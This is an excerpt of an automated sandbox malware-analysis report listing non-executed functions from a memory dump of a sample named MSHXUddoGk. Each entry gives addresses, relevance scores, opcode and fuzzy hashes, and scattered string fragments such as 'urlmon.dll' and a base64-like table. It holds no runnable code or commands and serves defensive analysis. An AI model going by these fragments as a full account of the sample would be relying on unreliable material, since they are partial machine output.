                                          • Snapshot File: hcaresult_16_2_55c0000_MSHXUddoGk.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 9adba5860cfba01e957bf11915fa5b84e4844f9aa91cd6ddf5491c25093217bb
                                          • Instruction ID: ce2a54122417f8735fb25e1179df0b1278da04a376a182c678582ce0fd7449bf
                                          • Opcode Fuzzy Hash: 9adba5860cfba01e957bf11915fa5b84e4844f9aa91cd6ddf5491c25093217bb
                                          • Instruction Fuzzy Hash: F6B0924523C22A722C6234B00D540B61A8AC297460A716950AAD2E8256A5C0897AA086
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Non-executed Functions

                                          Function 058C176C Relevance: 51.4, Strings: 41, Instructions: 168COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000010.00000002.2595680421.00000000055C0000.00000040.00000001.00040000.00000000.sdmp, Offset: 055C0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_16_2_55c0000_MSHXUddoGk.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID: !"#$$%&'($)*+,$-./0$123@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@@@@@$@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@>@@@?456789:;<=@@@@@@@
                                          • API String ID: 0-3248090998
                                          • Opcode ID: 85e7ed11310201ae8c6dc340ba936016d97ace6716b91c568e32b95e0102c19b
                                          • Instruction ID: 75ca3a544cdca2d66cbe6965d5a06cd1cde7398c64b95888dcb0b2e920c9dde6
                                          • Opcode Fuzzy Hash: 85e7ed11310201ae8c6dc340ba936016d97ace6716b91c568e32b95e0102c19b
                                          • Instruction Fuzzy Hash: 2B9100F09042A98ACB118F55A4643DFBF71BB95204F1581EDC6AA7B203C3BE4E85DF90
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 058CF4A0 Relevance: 34.0, Strings: 27, Instructions: 261COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000010.00000002.2595680421.00000000055C0000.00000040.00000001.00040000.00000000.sdmp, Offset: 055C0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_16_2_55c0000_MSHXUddoGk.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID: $$$$%$)$)$.$5$>$B$E$F$F$H$J$Q$T$g$h$i$m$s$u$urlmon.dll$v$w$}$}
                                          • API String ID: 0-1002149817
                                          • Opcode ID: 336e6db100789fbcb90e7d31b9cc6198b866c9f736f1746dc3929311d0a282af
                                          • Instruction ID: af183fae30a17f25870323f053a65c3d54354b2be334203828efa4dbdbc0effb
                                          • Opcode Fuzzy Hash: 336e6db100789fbcb90e7d31b9cc6198b866c9f736f1746dc3929311d0a282af
                                          • Instruction Fuzzy Hash: A2C11EB1D003689EDB61DFA4CD44BEEBBB9AF45304F0041D9D54CAB241E7B55A88CFA2
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 058B7DD8 Relevance: 30.1, Strings: 24, Instructions: 131COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000010.00000002.2595680421.00000000055C0000.00000040.00000001.00040000.00000000.sdmp, Offset: 055C0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_16_2_55c0000_MSHXUddoGk.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID: M$!g$$$'$0)$9b$9t$;$EN$F"$J$M3$N9$Py$R$cz$e$j$p$qr$qu$t$t<$t~
                                          • API String ID: 0-3062056613
                                          • Opcode ID: 87335a2e6d8b3f75f6003e3966e55946dd36653caacf5cc1998e568a9551f02f
                                          • Instruction ID: f125b517e253711928f4e8c2c4392001bb7088c7736ae8d2448eb44f82fc7093
                                          • Opcode Fuzzy Hash: 87335a2e6d8b3f75f6003e3966e55946dd36653caacf5cc1998e568a9551f02f
                                          • Instruction Fuzzy Hash: 009128B0D05669CBEB61CF55C9587DEBBB1BB45308F1082D8C55C2B281CBFA1A89CF91
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 058B7DE0 Relevance: 30.1, Strings: 24, Instructions: 129COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000010.00000002.2595680421.00000000055C0000.00000040.00000001.00040000.00000000.sdmp, Offset: 055C0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_16_2_55c0000_MSHXUddoGk.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID: M$!g$$$'$0)$9b$9t$;$EN$F"$J$M3$N9$Py$R$cz$e$j$p$qr$qu$t$t<$t~
                                          • API String ID: 0-3062056613
                                          • Opcode ID: 9c670b0cb59e752cd168e183b79e2434c3e2dc9dbd177a557eed245c5b6615c0
                                          • Instruction ID: 05de12cbe39dacde82032e667bbb80e4efffe9d8bbb82df97b18d28b35f66502
                                          • Opcode Fuzzy Hash: 9c670b0cb59e752cd168e183b79e2434c3e2dc9dbd177a557eed245c5b6615c0
                                          • Instruction Fuzzy Hash: 049136B0D06669CBEB60CF45C9587DEBBB1BB05308F1081D8C55C2B281CBBA1A89CF91
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 058CC915 Relevance: 25.2, Strings: 20, Instructions: 250COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000010.00000002.2595680421.00000000055C0000.00000040.00000001.00040000.00000000.sdmp, Offset: 055C0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_16_2_55c0000_MSHXUddoGk.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID: $2$I$I$\$e$g$i$l$l$m$o$r$r$r$r$t$t$t$x
                                          • API String ID: 0-3236418099
                                          • Opcode ID: f2d82fd42b6edc7505b24b612e0f5260944d679d5e77318bb8b68024390f2193
                                          • Instruction ID: 35a4c9c78c8822e6ef253b9c8e90e8d556da0872216d5d782573a823a7194c21
                                          • Opcode Fuzzy Hash: f2d82fd42b6edc7505b24b612e0f5260944d679d5e77318bb8b68024390f2193
                                          • Instruction Fuzzy Hash: 109120B1900318AAEB10DB989C85BEEB7BDEF44704F4041A9E908E6141EB755F85CF66
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 058C8310 Relevance: 16.4, Strings: 13, Instructions: 189COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000010.00000002.2595680421.00000000055C0000.00000040.00000001.00040000.00000000.sdmp, Offset: 055C0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_16_2_55c0000_MSHXUddoGk.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID: $.$F$P$e$i$l$m$o$o$r$s$x
                                          • API String ID: 0-392141074
                                          • Opcode ID: 02c41372fb38ae15f98df98ddb8e0c5f659bf95774302d9236992eb6baaa0583
                                          • Instruction ID: dd53e4a0b417b12e33f9afdddfeab759526ea8be81abef2106e14d0b7cb4f959
                                          • Opcode Fuzzy Hash: 02c41372fb38ae15f98df98ddb8e0c5f659bf95774302d9236992eb6baaa0583
                                          • Instruction Fuzzy Hash: 017164B2E00318AADB15EB94CC44FEEB7BCBF04704F44419DEA08E6141EB746B448FA6
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 058C8308 Relevance: 16.4, Strings: 13, Instructions: 174COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000010.00000002.2595680421.00000000055C0000.00000040.00000001.00040000.00000000.sdmp, Offset: 055C0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_16_2_55c0000_MSHXUddoGk.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID: $.$F$P$e$i$l$m$o$o$r$s$x
                                          • API String ID: 0-392141074
                                          • Opcode ID: 6d92c4a14a18827510d0950f05213a4479bc506bdaf9a1a501a0ff144fda1b77
                                          • Instruction ID: 549ef1d98587d5c7bbbfb38d8b5e9972c999e1d63b3110d40a865487d61a7d8a
                                          • Opcode Fuzzy Hash: 6d92c4a14a18827510d0950f05213a4479bc506bdaf9a1a501a0ff144fda1b77
                                          • Instruction Fuzzy Hash: 3D6142B2D10318AADB15DB94CC44FEEB7BDBF04704F44419DEA09E6141EB746B448F66
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 058C3600 Relevance: 15.2, Strings: 12, Instructions: 230COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000010.00000002.2595680421.00000000055C0000.00000040.00000001.00040000.00000000.sdmp, Offset: 055C0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_16_2_55c0000_MSHXUddoGk.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID: "$"$"$.$/$P$e$i$m$o$r$x
                                          • API String ID: 0-2356907671
                                          • Opcode ID: 0c1cd07a81553834d45935d298a0df2cb4d5764aa5771e606bc1451bfd1a2276
                                          • Instruction ID: 50b7887669082157c981a3c97d73267475abcf0c0aa1450a9a1188ad67ee880f
                                          • Opcode Fuzzy Hash: 0c1cd07a81553834d45935d298a0df2cb4d5764aa5771e606bc1451bfd1a2276
                                          • Instruction Fuzzy Hash: 438183B2D103186AEB51EBA8DC84FEFB7BCEF44704F404499A908E6141EA759B44CB72
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 058BC447 Relevance: 13.8, Strings: 11, Instructions: 85COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000010.00000002.2595680421.00000000055C0000.00000040.00000001.00040000.00000000.sdmp, Offset: 055C0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_16_2_55c0000_MSHXUddoGk.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID: D$\$e$e$i$l$n$r$r$w$x
                                          • API String ID: 0-685823316
                                          • Opcode ID: d750cd7c85c804fbd84fbcce7ecf85770744b6b57f1449910adf80f7b1e02de0
                                          • Instruction ID: 52f843c0062d005d0b2ba3f6a0a34522e397b86e57ad2fd81b58963cba10c16a
                                          • Opcode Fuzzy Hash: d750cd7c85c804fbd84fbcce7ecf85770744b6b57f1449910adf80f7b1e02de0
                                          • Instruction Fuzzy Hash: 7A3189B1D15318AEDF50DF94CC49BEEBBB9BF44304F04818DE514BA140DBB55A48CBA5
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 058CCDC0 Relevance: 12.8, Strings: 10, Instructions: 342COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000010.00000002.2595680421.00000000055C0000.00000040.00000001.00040000.00000000.sdmp, Offset: 055C0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_16_2_55c0000_MSHXUddoGk.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID: :$:$:$A$I$N$P$m$s$t
                                          • API String ID: 0-2304485323
                                          • Opcode ID: 5c528742701cadeac0f800c35ee604e2bd0cef30f50e7add4e465f08801b0cf9
                                          • Instruction ID: 4a9f6d96b31eedd9eb82c65bb8a1373a54c3ff0ba3b7dc98e4beb31dc1c1ce18
                                          • Opcode Fuzzy Hash: 5c528742701cadeac0f800c35ee604e2bd0cef30f50e7add4e465f08801b0cf9
                                          • Instruction Fuzzy Hash: 4AD1F9B2A10308AFDB50EBA8CC84FEEB7F8EF48304F40851DE659D6141E778A9058B75
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 058B4E60 Relevance: 10.0, Strings: 8, Instructions: 40COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000010.00000002.2595680421.00000000055C0000.00000040.00000001.00040000.00000000.sdmp, Offset: 055C0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_16_2_55c0000_MSHXUddoGk.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID: *$-$M$`$p$r$v$x
                                          • API String ID: 0-1524397677
                                          • Opcode ID: 291dafda9c45f06185d33788e65d5971ef77773de68a4641087a3539c0b8dd03
                                          • Instruction ID: 2ed5b1f460d071230b37dc4aa8cfc510f8cb71387cee6a651d2a34ed7e6ed93c
                                          • Opcode Fuzzy Hash: 291dafda9c45f06185d33788e65d5971ef77773de68a4641087a3539c0b8dd03
                                          • Instruction Fuzzy Hash: 7411AF10D0C2CED9DB12C6AC84197AEBF715B12218F0882D9D4A56B2D3C2BA5609D7A6
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 058CFCF0 Relevance: 8.9, Strings: 7, Instructions: 115COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000010.00000002.2595680421.00000000055C0000.00000040.00000001.00040000.00000000.sdmp, Offset: 055C0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_16_2_55c0000_MSHXUddoGk.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID: L$S$\$a$c$e$l
                                          • API String ID: 0-3322591375
                                          • Opcode ID: 04dbbbcad5ac37e8562731b9efe55be5abd2da1ea2004d12c475aaf265b2e0d8
                                          • Instruction ID: 7402439fd043c66d0391a23880f577d7674d0067d683fa90a05c31d0bd33559c
                                          • Opcode Fuzzy Hash: 04dbbbcad5ac37e8562731b9efe55be5abd2da1ea2004d12c475aaf265b2e0d8
                                          • Instruction Fuzzy Hash: 7E416272D10218AADB10DFA8DC88BEEF7F9EF48314F41419EDA09E7100E77199458BA5
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 058C80D2 Relevance: 7.7, Strings: 6, Instructions: 173COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000010.00000002.2595680421.00000000055C0000.00000040.00000001.00040000.00000000.sdmp, Offset: 055C0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_16_2_55c0000_MSHXUddoGk.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID: F$P$T$f$r$x
                                          • API String ID: 0-2523166886
                                          • Opcode ID: f83d32e16675556bf8feafabb4ac8a29ac868e5578ea1da9b5ae85434f990ae5
                                          • Instruction ID: b9ceda14aab896ea35cdd12ff3b6c3ac9132f6297eb9d053f45b84bf0d86e06c
                                          • Opcode Fuzzy Hash: f83d32e16675556bf8feafabb4ac8a29ac868e5578ea1da9b5ae85434f990ae5
                                          • Instruction Fuzzy Hash: 9C51B471640714AEE734DBA8CC49BAAB7F8FF00700F40455EE94AD6180DBB4A944CFA2
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 058C7830 Relevance: 6.4, Strings: 5, Instructions: 198COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000010.00000002.2595680421.00000000055C0000.00000040.00000001.00040000.00000000.sdmp, Offset: 055C0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_16_2_55c0000_MSHXUddoGk.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID: $i$l$o$u
                                          • API String ID: 0-2051669658
                                          • Opcode ID: 98e3e0cafe42e104207fc2e5a1df9701cfd01722d837a1d077706e382caad5c8
                                          • Instruction ID: de0529f071c399c8e9feffc3376f92178b65890b1ff573095e9da2c1dca6f40c
                                          • Opcode Fuzzy Hash: 98e3e0cafe42e104207fc2e5a1df9701cfd01722d837a1d077706e382caad5c8
                                          • Instruction Fuzzy Hash: 59611FB1A00304AFDB24DBA4CC84FEFB7F9EB44710F10459DE959D7240D675AE458B61
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 058C74C2 Relevance: 5.3, Strings: 4, Instructions: 306COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000010.00000002.2595680421.00000000055C0000.00000040.00000001.00040000.00000000.sdmp, Offset: 055C0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_16_2_55c0000_MSHXUddoGk.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID: $e$k$o
                                          • API String ID: 0-3624523832
                                          • Opcode ID: b1e22e037e528106e70665eb27b633198c6715cb95ad21cb9598d12e4ab5e54d
                                          • Instruction ID: 03c68ee74a70f56b4a97418b39e998ed54dfbc0f2492d3eab0a5d3e7e94b32dd
                                          • Opcode Fuzzy Hash: b1e22e037e528106e70665eb27b633198c6715cb95ad21cb9598d12e4ab5e54d
                                          • Instruction Fuzzy Hash: C2B1FB75A00704AFDB24DBA8C885FEFB7F9EB88710F10855CEA59E7240DA75AE41CB50
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 058C7DC5 Relevance: 5.2, Strings: 4, Instructions: 229COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000010.00000002.2595680421.00000000055C0000.00000040.00000001.00040000.00000000.sdmp, Offset: 055C0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_16_2_55c0000_MSHXUddoGk.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID: $e$h$o
                                          • API String ID: 0-3662636641
                                          • Opcode ID: 8c13604a5a6ce14b26cb77fd83f116ca51407316dbda784c515c7a8fe83bbff1
                                          • Instruction ID: c2dd45157f133a20911b2b73aee6fb2a350b11d6b19e2421758c56b1b377b4ad
                                          • Opcode Fuzzy Hash: 8c13604a5a6ce14b26cb77fd83f116ca51407316dbda784c515c7a8fe83bbff1
                                          • Instruction Fuzzy Hash: 677131B2A102187EDB55EB58CC89FEEB3BCEF45204F4041D9B949D6141EE746B848BB3
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 058C74D0 Relevance: 5.2, Strings: 4, Instructions: 178COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000010.00000002.2595680421.00000000055C0000.00000040.00000001.00040000.00000000.sdmp, Offset: 055C0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_16_2_55c0000_MSHXUddoGk.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID: $e$k$o
                                          • API String ID: 0-3624523832
                                          • Opcode ID: a83eab0e551ded81dab2721a213820fa7e303834319d6dc80412ec8ce9f98a5a
                                          • Instruction ID: abe8c5c5800927d9aea73f4a5244dd0aa7fbedf7915f311cda0f89c4cf4c6046
                                          • Opcode Fuzzy Hash: a83eab0e551ded81dab2721a213820fa7e303834319d6dc80412ec8ce9f98a5a
                                          • Instruction Fuzzy Hash: 40610C75A00308ABDB54DFA8CC85FEFB7B9EF88700F10455CA659D7244DA70AA41CB60
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 058C7384 Relevance: 5.1, Strings: 4, Instructions: 121COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000010.00000002.2595680421.00000000055C0000.00000040.00000001.00040000.00000000.sdmp, Offset: 055C0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_16_2_55c0000_MSHXUddoGk.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID: FALSETRUE$FALSETRUE$TRUE$TRUE
                                          • API String ID: 0-2877786613
                                          • Opcode ID: e3f195ce2bf8c20474a61df9d832008eb6f652c4f3aa7a00b9c413472011e5d0
                                          • Instruction ID: 102ad32ae3a85b6ff89f0b0299d2c8073ba9a032b979a3fa34b1175942464c04
                                          • Opcode Fuzzy Hash: e3f195ce2bf8c20474a61df9d832008eb6f652c4f3aa7a00b9c413472011e5d0
                                          • Instruction Fuzzy Hash: 53415E71A012587EEB01EBA88C46FEFBB7CDF55600F404048FA04EA184D7756A4187FB
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 058C7390 Relevance: 5.1, Strings: 4, Instructions: 117COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000010.00000002.2595680421.00000000055C0000.00000040.00000001.00040000.00000000.sdmp, Offset: 055C0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_16_2_55c0000_MSHXUddoGk.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID: FALSETRUE$FALSETRUE$TRUE$TRUE
                                          • API String ID: 0-2877786613
                                          • Opcode ID: a1cefb592ba4ae6f9bd41d9b3391c3d407bbb9cb920d72a44487b819f5b3b3b5
                                          • Instruction ID: a27892271afaae29809f1ea71f47f0fe0f090d22e8d6dd192018068e2f3f2ac3
                                          • Opcode Fuzzy Hash: a1cefb592ba4ae6f9bd41d9b3391c3d407bbb9cb920d72a44487b819f5b3b3b5
                                          • Instruction Fuzzy Hash: F8314F716512587EEB01EBA88C46FEFBBBCDF55600F404048FA04EA185D7756A4187FB
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 058C7DD0 Relevance: 5.1, Strings: 4, Instructions: 100COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000010.00000002.2595680421.00000000055C0000.00000040.00000001.00040000.00000000.sdmp, Offset: 055C0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_16_2_55c0000_MSHXUddoGk.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID: $e$h$o
                                          • API String ID: 0-3662636641
                                          • Opcode ID: 13ff98a94a3fb46d8daa6db593d2fdce0a6cf06ba75229b63f69813245374fd3
                                          • Instruction ID: 4989a057bcbc76d4b6794b4393b62f900a6c11b086b8c5420905cabdf7e92f7a
                                          • Opcode Fuzzy Hash: 13ff98a94a3fb46d8daa6db593d2fdce0a6cf06ba75229b63f69813245374fd3
                                          • Instruction Fuzzy Hash: 70310E72E103187EDF54EB68CC45FEEB3B8EF45700F4041DAA949E6141EA746A848FA7
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 058C4D70 Relevance: 5.0, Strings: 4, Instructions: 47COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000010.00000002.2595680421.00000000055C0000.00000040.00000001.00040000.00000000.sdmp, Offset: 055C0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_16_2_55c0000_MSHXUddoGk.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID: $e$k$o
                                          • API String ID: 0-3624523832
                                          • Opcode ID: c2e639e9a832b6972aa22850a34bedb9866684519ce502745d787b2026cae3b5
                                          • Instruction ID: 62ba2ed9c54d4a1370c18af319ca0076570c7b93cf0bc58ce0a800d679e98393
                                          • Opcode Fuzzy Hash: c2e639e9a832b6972aa22850a34bedb9866684519ce502745d787b2026cae3b5
                                          • Instruction Fuzzy Hash: E901C4B2900308ABDB14DF98D884BDEF7B9FF08304F448259E9099B202E7719945CBB0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 058B1AB0 Relevance: 5.0, Strings: 4, Instructions: 24COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000010.00000002.2595680421.00000000055C0000.00000040.00000001.00040000.00000000.sdmp, Offset: 055C0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_16_2_55c0000_MSHXUddoGk.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID: -$JWD]$KALY$KALY
                                          • API String ID: 0-2270481156
                                          • Opcode ID: 45f7fbc411875e5444a113a57d4c0cb82c1fcbd81bc3055dfb98c1a6e094089a
                                          • Instruction ID: b1f8b7ddd8813a946f9895faaa06f078e8f104bceca52ad03e7a1aa09f2beb37
                                          • Opcode Fuzzy Hash: 45f7fbc411875e5444a113a57d4c0cb82c1fcbd81bc3055dfb98c1a6e094089a
                                          • Instruction Fuzzy Hash: 5EE09B6490424C7EDB00DFF898056AEFF78E712100F508999DC54DB242D6745605C792
                                          Uniqueness

                                          Uniqueness Score: -1.00%